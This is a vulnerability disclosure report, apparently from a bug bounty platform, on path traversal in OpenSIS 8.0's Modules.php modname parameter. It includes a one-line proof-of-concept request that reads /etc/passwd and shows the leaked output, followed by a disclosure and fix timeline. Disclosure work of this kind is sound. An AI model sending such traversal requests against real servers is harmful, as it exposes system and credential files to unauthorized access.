Path Traversal in os4ed/opensis-classic

Valid

Reported on

Aug 28th 2021


✍️ Description

The module.php modname parameter in OpenSIS 8.0 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.;

🕵️‍♂️ Proof of Concept

//  Modules.php
GET /Modules.php?modname=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1 302 Found
Location: index.php

                <!-- Main content -->
                <div class="content-wrapper"><div id='content' name='content' class='clearfix'><div id='update_panel'><div id='divErr' class="text-left text-danger"></div><DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100;"></DIV>root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
</div><div id='cal' style='position:absolute;'></div></div>
    </div>
        </div>
        </div>
                <!-- /main content -->

💥 Impact

Enables an attacker to access sensitive files

Z-Old
a year ago

Admin


Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back a year ago
We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. a year ago
N
a month ago

Researcher


@admin Good Day - This was fixed under https://github.com/OS4ED/openSIS-Classic/commit/a2d617977fa159185263845ac75b8c83cddd07f0#diff-122b22cacc5d5ac0e1a9928563c6187f2edae3f7b33035cea6fe34d8a07ef309 -- Would you please be able to manually validate? Thank you

Pavlos
a month ago

Admin


Asked the maintainer to confirm this and your other report :)

Pavlos validated this vulnerability a month ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 8.0 with commit a2d617 a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Modules.php#L954-L976 has been validated
Pavlos published this vulnerability a month ago
to join this conversation